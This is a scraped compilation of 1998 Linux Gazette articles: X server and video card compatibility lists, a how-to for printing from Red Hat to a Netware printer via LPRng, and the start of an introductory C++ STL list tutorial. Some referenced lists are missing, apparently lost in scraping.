Red Hat has a hardware compatibility list, but it's not obvious where to find it.  Try "JumpWords" at the bottom of the main page, choose "Hardware" and then the distribution you are currently running.  These lists are far better than any of the X server vendor lists because they tell you specifically which card goes with which server.  Since Red Hat ships the XFree86 servers, this list is applicable to both S.u.S.E. and XFree86.  Note:  if you get to this list via the Red Hat main site (www.redhat.com) and you want a printable version of the page, select "No Frames" at the bottom of the page.  The link below, however, will take you straight to the list.

http://www.redhat.com/support/docs/rhl/intel/rh51-hardware-intel-11.html
Caldera's site has no such obvious hardware compatibility list.  A search for "hardware compatibility" returns as its first entry a link to a video card compatibility list for XFree86 - but the link is invalid!  They definitely need to work on their site structure.  Neither Slackware (via Walnut Creek's web site) nor InfoMagic is set up to provide this sort of user information.

XFree86

This one is actually the easiest of the bunch, but don't start your search on the XFree86 site to figure it out.  Instead, take a look at Red Hat's online list of supported hardware.   They have video cards listed there sorted by which server supports which card.

Using the set of cards listed previously, the following servers are expected to work (not all cards listed previously were listed on the Red Hat supported hardware list):
 

Video Card XFree86 Server (all prefixed with "XF86_")
ATI All in Wonder Mach64
ATI Xpert@Play Mach64
Creative Labs Graphics Blaster Extreme, Professional Edition SVGA
Creative Labs Graphics Blaster Extreme, Value Edition SVGA
Diamond Viper V330 SVGA
Diamond Stealth 2000 S3V
Elsa WINNER 2000 / Office S3V
Hercules Dynamite 3D/GL  SVGA (maybe)
Hercules Terminator 2X/i SVGA (maybe)
Hercules Stingray 128 3D SVGA
Jaton S3 Video S3V (reported from one respondent)
Matrox Mystique G200 SVGA
Matrox Millennium G200 SVGA
STB Velocity 128 SVGA
STB Velocity 4400 SVGA (maybe)

You can, additionally, look on the XFree86 site for more information.  The following list is one I gathered from perusing the www.xfree86.com web site.  Note that many of the listed cards are older models and not typically what you'll find on the shelves these days.  Still, you may be able to purchase some of them by mail order.
 

Servers  Cards
SVGA  ATI GAWonder series:  VGAWonder V3, VGAWonder V4, VGAWonder V5, VGAWonder+, VGAWonder XL, VGAWonder XL24, VGA Basic 16, VGA Edge, VGA Edge 16, VGA Integra, VGA Charger, VGAStereo F/X, VGA 640, VGA 800, VGA 1024, VGA 1024D, VGA 1024 XL, VGA 1024 DXL, VGA 1024 VLB
      Matrox:  Millennium (MGA2064W) with Texas Instruments TVP3026 RAMDAC.  It has been tested with 175MHz, 220MHz and 250MHz versions of the card with 2MB, 4MB and 8MB WRAM.  Millennium II (MGA2164W), both PCI and AGP, with Texas Instruments TVP3026 RAMDAC.  It has been tested with 220MHz and 250MHz versions of the card with 4MB, 8MB and 16MB WRAM.  Mystique with 170 and 220 MHz integrated RAMDACs (both MGA1064SG and MGA1164SG).
Mach8  Graphics Ultra, Graphics Vantage, VGAWonder GT (none of the 8514/Ultra and 8514 Vantage series is supported at this time)
Mach32  Graphics Ultra+, Graphics Ultra Pro, Graphics Wonder, Graphics Ultra XLR, Graphics Ultra AXO, VLB mach32-D, PCI mach32-D, ISA mach32
Mach64  Graphics Xpression, Graphics Pro Turbo, Win Boost, Win Turbo, Graphics Pro Turbo 1600, Video Xpression, 3D Xpression, Video Xpression+, 3D Xpression+, All-In-Wonder, All-In-Wonder PRO, 3D Pro Turbo, ATI-TV, XPERT@Play, XPERT@Work, XPERT XL
S3  Orchid Fahrenheit 1280+ VLB; STB PowerGraph X.24 S3 (ISA), Pegasus VL, Velocity 64; Diamond Stealth 24 VLB, Stealth 64 DRAM; ELSA Winner 1000 ISA/EISA (``TwinBus'', not Winner1000ISA!!), Winner 1000 VL, Winner1000PRO VLB, Winner1000PRO PCI; #9 GXE Level 10, 11, 12, 14, 16, GXE64 - PCI, Pro VLB, Pro PCI, Trio64, FX Motion 771
S3V (ViRGE)  Supports PCI hardware:  ViRGE, ViRGE/DX, ViRGE/GX, ViRGE/GX2, ViRGE/MX, and ViRGE/VX, but no specific cards were listed.  Newer support has been moved to the SVGA server.
P9000  Diamond Viper VLB and PCI cards

This is not a complete list, but does cover most of the off the shelf cards you may run into at local retailers or on the Internet.

All binary versions of the XFree86 servers can be found at ftp://ftp.XFree86.org/pub/XFree86/current/binaries/<OS>
For example, Linux/Intel would be under ftp://ftp.XFree86.org/pub/XFree86/current/binaries/Linux-ix86/Servers/.
Additionally, a properly installed Linux system with the XFree86 run-time system (which includes X11 libraries, clients and X servers) should contain the file /usr/X11R6/lib/X11/Cards listing the currently known set of supported cards.
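
That makes a quick local lookup possible; for example ("millennium" is just a sample search string, and -A is a GNU grep option):

# Search the Cards database for entries mentioning a card name
grep -i -A 4 'millennium' /usr/X11R6/lib/X11/Cards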
 

S.u.S.E

SuSE (www.suse.com), which is known primarily as a Linux distributor rather than as an X server vendor, has a searchable database of graphics cards.  From their main page choose "Hardware DB", then "Graphics Cards" from the scrollable list of topics.  The DB search results are fairly informative but are titled in German.  Don't let that throw you, since the real info you're looking for is basically language independent when it's displayed.

Since S.u.S.E. ships the XFree86 servers along with a few of their own servers (usually developed initially under NDA until S.u.S.E. can get them into the XFree86 distribution), I'll just list those servers for which I could not find an XFree86 server specifically listed by Red Hat or the XFree86 web site.
 

Card Server
Diamond Stealth II S220 rendition
Diamond Fire GL 1000 Pro glint
Elsa GLoria Synergy glint
Hercules Thriller 3D rendition
LEADTEK WinFast 2300  unknown - it's listed, but no server is given

Additionally, S.u.S.E. servers are based on XFree86 servers but with extended features.  These updates will be or have already been incorporated into the next XFree86 releases.
 

XFCom_Matrox
Matrox Millennium G200 AGP
Matrox Millennium II (PCI and AGP)
Matrox Millennium
Matrox Mystique
XFCom_3DLabs server
GLINT MX + GLINT Delta + IBM RGB 526DB:
ELSA GLoria L/MX
GLINT 500TX + GLINT Delta + IBM RGB 526DB:
ELSA GLoria L
DIAMOND Fire GL 3000
GLINT MX + GLINT Delta + IBM RGB 640:
ELSA GLoria XL


PERMEDIA + GLINT Delta + IBM RGB 526DB:

ELSA GLoria S
DIAMOND Fire GL 1000
PERMEDIA-2:
ELSA GLoria Synergy
ELSA WINNER 2000/Office
DIAMOND Fire GL 1000 Pro
CREATIVE Blaster Exxtreme
LEADTEK WinFast 2300
Basically, most cards with Permedia 2 or Permedia 2v chipset (including AGP versions) should work.
After searching the XFree86 sites (www.xfree86.com, Red Hat and S.u.S.E.) I was still unable to find drivers for the following cards:
All of the S.u.S.E.-specific X servers can be found at http://www.suse.de/XSuSE/XSuSE_E.html.

Xi Graphics AcceleratedX

Unlike the XFree86 project, the two commercial server vendors deliver what is essentially a single server, with support for all video cards handled through loadable object modules.  The essential difference here is that with the commercial vendors you load their package and then configure based on your card, without having to worry about which module to load.  It's a one-step difference, essentially, since with XFree86 you need to know ahead of time which server to configure.  With the commercial vendors there is really just the one server, but you still have to give it much of the same configuration information you would give XFree86.

Unlike XFree86 and MetroLink, Xi Graphics lists the Chip Type used in cards by technical number instead of by name.  You can see this if, under Xsetup, you select a Graphics Board and then hit TAB.  The small window that opens lists various card information, such as the ATI264GT Chip Type for the ATI All In Wonder card.  Although graphics card vendors don't always list the names of the chipsets they use (like 3D Rage or Rendition Verite), they are even less likely to list the Chip Type.  Fortunately, the set of named boards in Xi Graphics' lists is quite large, and the need to find a specific chipset may not be so important.

The following cards, from the list of cards given previously, were found in the Xsetup tool under Graphics Boards for the 4.1.2 server:

ATI All in Wonder (3D Rage II)
ATI All in Wonder Pro (3D Rage Pro)
ATI Xpert@Play PCI and AGP (3D Rage Pro)
Diamond Fire GL 1000 (Permedia 2)
Diamond Fire GL 1000 Pro (Permedia 2)
Elsa GLoria Synergy (Permedia 2)
Elsa WINNER 2000 / Office (Permedia 2)
Hercules Dynamite 3D/GL (Permedia 2)
Hercules Stingray 128 3D
LEADTEK WinFast 2300 (Permedia 2)

The following cards were not found specifically by name, but they may be supported anyway using a configuration for a similar card.  You need to check with Xi Graphics to be certain.  Remember:  these cards might have only minor differences from similar cards from the same vendor.  However, since Xi lists these with Chip Types instead of chipset names, it's not obvious that a given card will work.

Additionally, Xi Graphics recently announced support for hardware accelerated OpenGL in a demonstration only version of their "Accelerated-X/OGL Technology Demo".  Chips supported include the Number 9 Ticket To Ride IV, 3Dlabs Permedia 2, Intel 740, 3Dlabs GLINT Delta + MX, and SiS 6326.  They also specify that Wacom tablets are explicitly supported along with Logitech Magellan (a "spaceball" device).

XFree86 does not currently support hardware accelerated OpenGL directly in their X servers.  A release date for the official version of Xi Graphics hardware accelerated OpenGL has not been announced at the time of this writing.

Accelerated-X runs for $99.95 for US shipments, with upgrade pricing starting at $49.95.  Xi Graphics can be found on the net at http://www.xig.com.

MetroLink MetroX

MetroLink has also announced hardware acceleration for OpenGL with their "Extreme3D" product.  This product is expected to ship in December 1998, according to the press release at http://www.metrolink.com/extrem3d.html.  However, I was told by Chris Bare at MetroLink that it's more likely to be January 1999.  The press release states that support will be available for the following chipsets:

Like Xi Graphics, MetroLink has one server which supports many cards and chipsets through loadable modules.  Since this architecture doesn't require that I match servers to cards, I'll just list the cards and the chipsets MetroX reportedly supports:
 
Card  Chipset
ATI 3D RAGE  3D RAGE
ATI 3D RAGE II  3D RAGE II
ATI ALL-IN-WONDER PRO AGP  3D RAGE PRO
ATI ALL-IN-WONDER PRO PCI  3D RAGE PRO
ATI Graphics Pro Turbo  Mach64
ATI Graphics Ultra  Mach8
ATI Graphics Xpression  Mach64
ATI Mach32  Mach32
ATI Mach64  Mach64
ATI VGA STEREO-F/X  ATI 28800
ATI Winturbo PCI  Mach64
ATI XPERT@Play  3D RAGE PRO
ATI XPERT@Play AGP  3D RAGE PRO
ATI XPERT@Work  3D RAGE PRO
ATI XPERT@Work AGP  3D RAGE PRO
Diamond Fire GL 1000Pro  PERMEDIA 2
Diamond SpeedStar 24X  Western Digital 90C31
Diamond SpeedStar Pro SE  Cirrus 5430
Diamond Stealth 24  S3 801
Diamond Stealth 32  ET4000/W32p
Diamond Stealth 3D 2000  S3 ViRGE
Diamond Stealth 64  S3 964, Bt485KPJ135
Diamond Stealth 64 DRAM  S3 Trio64
Diamond Stealth 64 DRAM (SDAC)  S3 864, S3 SDAC
Diamond Stealth 64 Graphics 2000 Series  S3 864, S3 SDAC
Diamond Stealth 64 Graphics 2200  S3 Trio64
Diamond Stealth 64 VRAM  S3 968, IBM RGB526CF22
Diamond Stealth 64 Video 3000 Series  S3 968, TI 3026-175
Diamond Stealth 64 Video VRAM  S3 968, TI 3026-175
Diamond Stealth Video (SDAC)  S3 868, S3 SDAC
Diamond Stealth Video 2000 Series  S3 868, S3 SDAC
Diamond Viper (110 MHz RAMDAC)  P9000
Diamond Viper (135 MHz RAMDAC)  P9000
ELSA GLoria Synergy  PERMEDIA 2
ELSA Victory 3D  S3 ViRGE
ELSA Winner 1000 TRIO/V  S3 Trio64V+
ELSA Winner 2000 AVI  S3 968, TI 3026-175
ELSA Winner 2000 PRO/X-2, -4  S3 968, TI 3026-220
ELSA Winner 2000 PRO/X-8  S3 968, IBM RGB528CF25
Matrox Marvel  ET4000
Matrox Marvel II  ET4000
Matrox Millennium  MGA Storm
Matrox Millennium II AGP  MGA 2164, TI 3026-250
Matrox Millennium II PCI (220 MHz)  MGA 2164, TI 3026-220
Matrox Millennium II PCI (250 MHz)  MGA 2164, TI 3026-250
Matrox Mystique  MGA 1064
Matrox Mystique 220  MGA 1164
Number Nine GXE64  S3 864
Number Nine Imagine 128  Imagine 128
Number Nine Imagine 128 Series 2  Imagine 128 Series 2
Number Nine Motion 531  S3 868
Number Nine Motion 771  S3 968
Number Nine Revolution 3D  Ticket to Ride
Number Nine Vision 330  S3 Trio64
Orchid Kelvin 64  Cirrus 5434
STB NITRO 3D  S3 ViRGE/GX
STB/Symmetric GLyder MAX-2  PERMEDIA 2

MetroLink's web site is at http://www.metrolink.com.  Platform specific information for Linux can be found at
Intel: http://www.metrolink.com/metrox431-intel/cardlist4.3.1.html
Alpha: http://www.metrolink.com/metrox431-alpha/cardlist4.3.1.html

The MetroLink site currently lists their Metro-X Enhanced Server Set 4.3 for $39 and supports it on both Intel/x86 and Alpha-based Linux systems.  With the price drop to $39, MetroLink has dropped its upgrade pricing policies.

The future

C|Net reported recently that there are some 40 computer graphics chip vendors in the 3D market today.  This is far more than the industry can sustain, and an eventual consolidation is inevitable.  Furthermore, all three of the major CPU vendors - Intel, Cyrix and AMD - currently have plans for integrating graphics functions into the CPU itself.  The graphics card world is changing fast, and it's not quite clear what effect this will have on end users.  If you work with computer graphics, it will be necessary to keep abreast of upcoming changes.

A Final Word, or Words

There are a couple of things I didn't cover in this article:

MPEG - I don't know whether any X servers yet support hardware decoding of MPEGs (highly compressed animation files), but I suspect they don't.  You can view these animations using software to decode the MPEG.  This works, but software decoding will always be slower than hardware decoding.
Laptops - Laptop vendors, at least in the recent past, didn't like to give out much information on their video subsystems, because it was one way to maintain product differentiation from competitors.  More support has come recently, and you can expect to see better information on which laptops are supported under X Windows in the coming months.  For now, check out the following page:  http://www.cs.utexas.edu/users/kharker/linux-laptop/
NeoMagic chipsets are being used in many laptops these days.  XFree86 (via either Red Hat and/or S.u.S.E) and Xi Graphics definitely have servers for these chips that are known to work on at least some laptops.  MetroLink may as well, but I didn't check on this since I wasn't going to concern myself too deeply with laptop issues.
It's hard to keep up with vendor naming schemes and to match them to chipsets.  That's why X server vendors don't do it that often.  It's a situation that has developed due to the fact that PC video cards grew up in a world without X Windows, and X servers grew up (originally, quite some time ago) in a world without PCs.  It's the nature of the beast, you might say.  But things are changing now.  With the acceptance of Linux in the corporate world you will begin to see video card vendors show much more interest in the X Windows world.  How that will translate into users matching video cards with X servers remains to be seen, but I expect life to get much easier in the next year.

Confused?  Me too, but it's not that hard to digest when you think of it this way:  you'll buy a 3D card because that's what's on the shelves at retailers, and you'll either have or not have support for the actual 3D acceleration.  As long as a driver exists for the card, you'll at least be able to run X Windows and nearly all the applications available for it.

If you're looking for a cheap card you can still find them on the Net.  Take a look at Computers.com under their graphics and sound section and do searches by company name (e.g. "matrox").  You'll find a number of older 2D boards listed with links on where you can buy them.  These cards run well under $100, some for as low as $30.

Acknowledgements

I'd like to thank a number of people for their assistance in putting this article together.  Paul Sargent of 3Dlabs was especially helpful, providing definitions and information on what I'm sure to him must be real beginner questions.  Jeremy Chatfield provided similar help.  Along with these two, I received helpful bits of information from Dirk Hohndel of S.u.S.E, many members of the Boulder Linux Users Group, Federico Mena Quintero and Miles O'Neal.

Dirk Hohndel () asked that I mention the outstanding support given to XFree86 by ELSA.  Other companies that have provided support to them include ATI, Number 9, Matrox, and Diamond.

Sites for further reading:

3Dfx drivers in RPM format are available at: http://glide.xxedgexx.com/3DfxRPMS.html

The 3Dfx howto (http://www.gamers.org/dEngine/xf3D/howto/3Dfx-HOWTO.html) is an excellent document for information about using 3D hardware accelerated boards with Linux.  It focuses on 3Dfx boards, but describes some of the hardware related issues that other boards will encounter, such as AGP vs PCI.  Definitely a good read for anyone looking to get 3D hardware acceleration working.

Xi Graphics:  http://www.xig.com
MetroLink:  http://www.metrolink.com
XFree86:  http://www.xfree86.org
S.u.S.E.:  http://www.suse.com
Red Hat:  http://www.redhat.com

Some good sites for hardware specific information (although likely to be somewhat Microsoft oriented):



Metro Link and X Input Support
As usual, I didn't get around to writing my Muse column until very late in the month last month.  Because of this, MetroLink didn't get the opportunity to supply information regarding their X Input support before my deadline.  My apologies to them.  Here is the information they provided, sent by :
Sorry I didn't reply sooner, we had a pesky hurricane to deal with and were closed Thursday and Friday.

Presently, we do not support any tablets through X Input. Our server supports X Input drivers as loadable modules, and we have technical specs available so that third parties can write drivers. At present no one has attempted to port the Wacom tablet driver to our new architecture. (BTW, this new loadable design will be donated to XFree86 for their 4.0 release.)

Our configuration tool includes a touch screen calibration utility that works in graphics mode.

Here's the list of X Input drivers we currently support:

The only thing I know of that can use [3D Input Devices] is GLUT, and even then you have to write (relatively simple) GLUT code to integrate them into glut programs.  We also include sample code on our web page that shows how to access them from your own programs.

Here's the URL for info on the 3D devices:
http://www.metrolink.com/support/3dinput.html

Of course, now you're probably asking "What do the images look like and what can I do with them?"  Let's start by showing what a couple of the images I created using the Gimp and these stock photos look like.  The first of these I call Vogue; I whipped it out in a couple of hours just for this article (intermixed with watching a rerun of The X-Files - I really need to get out more).  The second is called Angel and took me a few days to put together.  Both images started with stock photos from the Women by Jack Cutler CD in the Sampler Ten Pack.
 
Vogue and Angel  (click either image to see a larger version)
Original portrait used for the Vogue artwork; original portrait used in Angel (scaled up from the actual thumbnail image).
 
Additionally, Angel includes an image taken from the Dawn & Dusk CD plus a texture from one of the Textures II CDs (although I can't remember which one now).  The Women and Dawn & Dusk CDs are both in the Sampler Ten Pack.

These particular example images aren't really representative of most Web-based applications, but what is important is the quality of the original stock.  The original images are of good quality, clear of defects and of reasonable color clarity.  If you consider the range of topics covered by the other Super Ten Packs, there is likely to be some set of images which will be useful in any future web artwork you may do.  When you consider that stock photographs often run closer to $200-$300 for 100 images in other collections, the Corel Super Ten Packs are a pretty decent bargain and well worth the cost.


Thumbnail of sunset image used in Angel.

 
 
 

"Linux Gazette...making Linux just a little more fun!"


How to print to a Printer on a Netware server

By


Introduction


To understand the circumstances which led to me writing this little article, I have to explain a few things first. I am a student at the University of Stellenbosch in South Africa. We have a lot of Netware servers on campus, and most of the printers used by students are connected to one of these servers. A while ago I installed Linux for two friends of mine. They were quite impressed with the performance, and after a while the decision was made to install Linux on two of the other computers too. To make the switch from Windows to Linux as smooth as possible, one of the requirements of the new setup was that the Linux PCs should be able to print to the Netware printer upstairs without any additional steps (saving as text, converting to PostScript, and printing with nprint), in other words, point and click the way Windows users do it all the time. This article explains how I did it.

This article assumes that you'll be using only one printer, namely the Netware printer. Because this procedure includes replacing the print spooler daemon, I do NOT recommend it for a working installation with one or more printers (unless of course you know what you're doing, but then you wouldn't be reading this now, would you? :) ). Also, most of the instructions are rather Red Hat specific; if you are using another distribution, ask someone to translate :)


How does it work?


A print spooler is a program that accepts print jobs from computers on the network. Usually the print jobs are stored on disk until the printer becomes available again. The print spooler program also places an exclusive lock on the device your printer is connected to, usually /dev/lp1. This prevents other users or programs from printing while the print spooler is busy.

The print spooler does, however, do no formatting of its own. It merely stores whatever you send it in a disk file, then sends it to the printer when it becomes available. To get some kind of intelligent formatting, filters are used. A print filter determines the type of data passing through it and performs conversions on it. This means it doesn't matter what you send to the printer; the printer will always get something printable, usually PostScript.

Filters also make it possible to do a few nice things. Since a filter is actually nothing more than a small program that reads from stdin and writes to stdout, we can write filter programs that do almost anything. In this case, I made the filter send the job to a Netware server.
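
To make the idea concrete, here is a toy version of such a filter (a sketch only, not the nwprint filter used below; the nprint options follow the ncpfs man page conventions, and SERVER, USER, PASSWD and QUEUE are placeholders):

#!/bin/sh
# Toy print filter: read the print job from stdin, then hand it to
# nprint from the ncpfs package.  All credentials below are placeholders.
TMP=/tmp/nwjob.$$
cat > "$TMP"
nprint -S SERVER -U USER -P PASSWD -q QUEUE "$TMP"
rm -f "$TMP"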


Requirements

You need the latest versions of:

Note: The location or version numbers of these software may have changed.


Installation

You have to be root to install this.

If you haven't already done so, recompile your kernel with IPX support, but not the full internal net. You may also compile IPX as a module. See the Kernel-HOWTO for more information about this.

Install ncpfs with: rpm -i ncpfs-2.0.11-3.i386.rpm (Your version number may differ)
You may also need to install ipx-utils. Rpm will notify you if you haven't installed ipx-utils yet.

Execute one of the following, depending on your setup. In my case the first line worked perfectly on all of the systems I have installed this on:

You may also want to read the man pages for these commands. Since you want to print to a Netware server, I assume you have access to it and should have no problem obtaining the correct settings here. You should also put this line in /etc/rc.d/rc.local so that it gets executed every time you boot your system.
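
For reference, a typical setup for a machine with one network card looks something like this (a sketch; check the ipx_configure and ipx_interface man pages for the exact options your version supports):

# Let the kernel pick up the IPX network and primary interface automatically
ipx_configure --auto_interface=on --auto_primary=on

# Or bind an interface by hand (802.2 frame type assumed here)
# ipx_interface add -p eth0 802.2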

You have to remove the existing lpd before installing LPRng; this is most easily accomplished with:

/etc/rc.d/init.d/lpd stop
rpm -e printtool
rpm -e rhs-printfilters
rpm -e lpr

Extract the LPRng and magicfilter tarballs into /usr/local/src (or anywhere else you feel comfortable with); they should untar into their own subdirectories. Now follow the directions given in the README or INSTALL files of both; this usually consists of ./configure, make, make install.
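
In other words, something along these lines (the archive names are examples; match them to what you actually downloaded):

cd /usr/local/src
tar xzf LPRng-3.5.1.tgz              # example archive names
tar xzf magicfilter-1.2.tar.gz
(cd LPRng-3.5.1 && ./configure && make && make install)
(cd magicfilter-1.2 && ./configure && make && make install)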

Create the directory /usr/local/printfilters and copy a suitable filter from /usr/local/src/magicfilter-1.2/filters to this directory. You may need to modify this file slightly to make it work properly. In my case I used the psonly600-filter file: on RH 5.1, a2ps was invoked with bad parameters; on RH 5.0, a2ps wasn't installed and was nowhere to be found on the CD-ROM, so I had to add this to the file:

default pipe mpage -ba4 -o -1

or install nenscript (from redhat cd) and add this line (this is probably the best option):

default pipe /usr/bin/nenscript -b -p-

Also, change these lines:

# postscript
0 %! postscript
0 \004%! postscript
to this:

# postscript
0 %! cat
0 \004%! cat

This is because "postscript" caused an extra clean page to be printed after every print job.

I also include this filter. It was originally used to print to an HP LaserJet 4000.

Copy nwprint, filter and .config to /usr/local/printfilters, then edit filter and replace psonly1200-filter with the filter you intend to use.

Edit the .config file to contain the information relevant to your setup.
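
The file is just shell variable assignments that nwprint reads; the variable names here are hypothetical placeholders, so use whatever names your copy of nwprint actually expects:

# /usr/local/printfilters/.config -- readable by root and daemon only
# (hypothetical variable names; values are placeholders)
NWSERVER=server1
NWUSER=printuser
NWPASSWD=secret
NWQUEUE=laser_q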

Now do:

 
        chmod 755 filter nwprint
        chmod 640 .config
        chown root.daemon .config

Install the lpd startup script in /etc/rc.d/init.d. Remember to do a chmod 755 /etc/rc.d/init.d/lpd.

Now you have to make symlinks to start lpd in the correct runlevels:

cd /etc/rc.d/rc3.d
ln -s ../init.d/lpd S90lpd
cd /etc/rc.d/rc5.d
ln -s ../init.d/lpd S90lpd
cd /etc/rc.d/rc6.d
ln -s ../init.d/lpd K08lpd
cd /etc/rc.d/rc0.d
ln -s ../init.d/lpd K08lpd

This should have lpd start up in the runlevels most commonly used by Red Hat users. (Note the uppercase S and K in the link names; the init scripts only run links that start with an uppercase S or K.)

Now we get to modifying a bunch of files in /etc...
Edit /etc/printcap to look like the following:

lp:\
:sd=/var/spool/lpd/lp:\
:mx#0:\
:sh:\
:if=/usr/local/printfilters/filter:\
:af=/var/spool/lpd/lp/acct:\
:lp=/dev/null:

Edit /etc/lpd.conf and locate the line:

# Purpose: lock the IO device
# lk@

Uncomment the "lk@". This tells lpd NOT to place an exclusive lock onto the device, so if any other program tries to use /dev/null while we're printing it will not break.

Edit /etc/lpd.perms and add these lines:

REJECT NOT SERVER
REJECT SERVICE=R,P,Q,M,C,S NOT REMOTEUSER=yourusername,another,friend

This allows only the users in the comma-separated list to print from the local host. I don't know what will happen if two users print at exactly the same time, but for the most part you will only allow yourself to print anyway.

Finally execute:

checkpc -f
/etc/rc.d/init.d/lpd start

Everything should work properly now. Clean up /usr/local/src: keep the tarballs in a safe place, then do this:

rm -rf /usr/local/src/magicfilter-1.2
rm -rf /usr/local/src/LPRng-3.5.1


Why it took me a week to figure this out...

I tried to do the same thing with lpd, but for some sinister reason nprint could not access any Netware servers when it was invoked by lpd. Only if the filter was invoked from the command line could nprint access the server and print the job. I had a few options: figure out a way of forcing lpd to allow me access, produce some kind of workaround, or use another spooler. Since lpd already has lots of other documented problems (I have read about them, but never seen them in action), I settled for LPRng.

At first I tried to make the standard Red Hat print filter work with LPRng. This did not work very well, because the standard filter uses files in /var/spool/lpd/lp, while LPRng is rather fussy about the permissions of files in this directory. Moving the files broke everything, and as it was already 3:00 on a Saturday morning by then, I quickly got magicfilter off sunsite (we have a local mirror :) ), compiled the software, and built myself a little filter script.

Now all I had to do was introduce some kind of password-hiding mechanism so that users of the system cannot see the Netware username and password. I discovered that the filter was executed as the "daemon" user, and therefore decided to create a .config file with permissions 640 and ownership root.daemon. This file is simply included into nwprint; while anyone can read nwprint, no one can read .config (except root and daemon, of course :) ).

This still allowed any user with access to the system to print. Usually you would want only yourself to have access to the printer, so after reading through /etc/lpd.perms and part of the documentation, I came up with the two REJECT lines mentioned above.


A few useful tips

Or rather, things I discovered while doing this...

1. To test the setup, change the nwprint script to cat all input to a file in /tmp. This is also a nice way to produce PostScript files from applications that cannot save in PostScript: just uncomment the "cat > /tmp/printout.ps" line in the nwprint script. Of course you'll have to comment the nprint line out :) You can even install this as a second "printer" alongside your existing printer.

2. To print from pine, you have to set up lpr as the default print command rather than the default it ships with.

3. Use the generic PostScript option in StarOffice. Even if you don't have a PostScript printer, you should be able to use it as long as ghostscript has a driver for your printer.

4. Look in /pub/Linux/system/printing on sunsite.unc.edu for other print filters. There are plenty of existing solutions for most of the Canon bubble-jet printers, as well as HP DeskJets and some of the Epson printers.

Also read the Printing-HOWTO. It should be installed in /usr/doc/HOWTO; if it is not there, locate the RPM on your Red Hat 5.0/5.1 CD and install it. Having the HOWTOs around is always nice, and is in my opinion a must.


DISCLAIMER


This is the place where I tell you that I am not responsible for any harm that may come to you or your computer as a result of following the steps in this article. Blah Blah...

If I did anything stupid or there are better ways to do this, please let me know at the e-mail address below; it should be valid at least until late 1999 :)

Izak Burger


Copyright © 1998, Izak Burger
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Introduction to STL, Standard Template Library

By Scott Field


This article is about a new extension to the C++ language, the Standard Template Library, otherwise known as STL.

When I first proposed the idea of an article on STL, I must say I somewhat underestimated the depth and breadth of the topic. There is a lot of ground to cover and there are a number of books describing STL in detail. So I looked at my original idea and refocused. Why was I writing an article and what could I contribute? What would be useful? Was there a need for another STL article?

As I turned the pages of Musser and Saini I could see programming time dissolving in front of me. I could see late nights disappearing, and on target software projects reappearing. I could see maintainable code. A year has passed since then and the software I have written using STL has been remarkably easy to maintain. And shock horror, other people can maintain it as well, without me!

However, I also remembered that at the beginning it was difficult wading through the technical jargon. Once I bought Musser & Saini everything fell into place, but before that it was a real struggle, and the main thing I yearned for was some good examples.

Also, the third edition of Stroustrup, which covers STL as part of C++, was not out when I started.

So I thought it might be useful to write an article about real-life use of STL for new STL programmers. I always learn faster if I can get my hands on some good examples, particularly on new subjects like this.

The other thing is, STL is supposed to be easy to use. So theoretically we should be able to start using STL straight away.

What is STL? STL stands for the Standard Template Library. Possibly one of the most boring terms in history, for one of the most exciting tools in history. STL basically consists of a bunch of containers - lists, vectors, sets, maps and more, and a bunch of algorithms and other components. This "bunch of containers and algorithms" took some of the brightest people in the world many years to create.

The purpose of STL is to standardise commonly used components so you don't have to keep reinventing them. You can just use the standard STL components off the shelf. STL is also part of C++ now, so there will be no more extra bits and pieces to collect and install. It will be built into your compiler. Because the STL list is one of the simpler containers, I thought that it might be a good place to start in demonstrating the practical use of STL. If you understand the concepts behind this one, you'll have no trouble with the rest. Besides, there is an awful lot to a simple list container, as we'll see.

In this article we will see how to define and initialise a list, count elements, find elements in a list, remove elements, and other very useful operations. In doing so we will cover two different kinds of algorithms, STL generic algorithms which work with more than one container, and list member functions which work exclusively with the list container.

Just in case anyone's wondering, here is a brief rundown on the three main kinds of STL components. The STL containers hold objects, both built-in types and class objects. They keep the objects secure and define a standard interface through which we can manipulate the objects. Eggs in an egg container won't roll off the kitchen bench. They are safe. So it is with objects in STL containers. They are safe. I know that sounds corny, but it's true.

STL algorithms are standard algorithms we can apply to the objects while they are in the container. The algorithms have well known execution characteristics. They can sort the objects, remove them, count them, compare them, find a particular one, merge objects into another container, and carry out many other useful operations.

STL iterators are like pointers to the objects in the containers. STL algorithms use iterators to operate on containers. Iterators set bounds for algorithms, regarding the extent of the container, and in other ways. For example some iterators only let the algorithms read elements, some allow them to write elements, some both. Iterators also determine the direction of processing in a container.

You can obtain iterators to the first position in a container by calling the container member function begin(). You can call the container end() function to get the past the end value (where to stop processing).

This is what STL is all about: containers, algorithms, and iterators to allow the algorithms to work on the elements in the containers. The algorithms manipulate the objects in a measurable, standard way, and are made aware of the precise extent of the container via iterators. Once this is done they won't ever "run off the edge". There are other components which enhance the functionality of these core component types, such as function objects. We will also look at some examples of these. For now, let's take a look at the STL list.


Defining a List

We can define an STL list like this.

 
#include <string>
#include <list>
int main (void) {
  list<string> Milkshakes;
}
That's it. You've defined a list. Could it have been any easier? By saying list<string> Milkshakes you've instantiated a template class, list<string>, and then instantiated an object of that type. But let's not fuss with that. At this stage you really only need to know that you have defined a list of strings. You need the header file list to provide the STL list class. I compiled these test programs using GCC 2.7.2 on my Linux box. For example:
 
g++ test1.cpp -otest1
Note that the include file iostream.h is buried in one of the STL header files. That's why it is missing in some of the examples.

Now that we have a list, we can start using it to hold things. We'll add some strings to the list. There is an important thing called the value type of the list. The value type is the type of the object the list holds. In this case the value type of the list is string, as the list holds strings.


Inserting elements into a list with the list member functions push_back and push_front

 
#include <string>
#include <list>
#
int main (void) {
  list<string> Milkshakes;
  Milkshakes.push_back("Chocolate");
  Milkshakes.push_back("Strawberry");
  Milkshakes.push_front("Lime");
  Milkshakes.push_front("Vanilla");
}
We now have a list with four strings in it. The list member function push_back() places an object onto the back of the list. The list member function push_front() puts one on the front. I often push_back() some error messages onto a list, and then push_front() a title on the list so it prints before the error messages.


The list member function empty()

It is important to know if a list is empty. The empty() list member function returns true if the list is empty. Empty is a deceptively simple concept. I often use it in the following way. Throughout a program I use push_back() to put error messages onto a list. Then by calling empty() I can tell if the program has reported any errors. If I define one list for informational messages, one for warnings, and one for serious errors, I can easily tell what types of errors have occurred just by using empty().

I can populate these lists throughout the program, then smarten them up with a title, or maybe sort them into categories, before printing them out.

Here's what I mean.

 
/*
|| Using a list to track and report program messages and status 
*/
#include <iostream.h>
#include <string>
#include <list>
#
int main (void) {
  #define OK 0 
  #define INFO 1
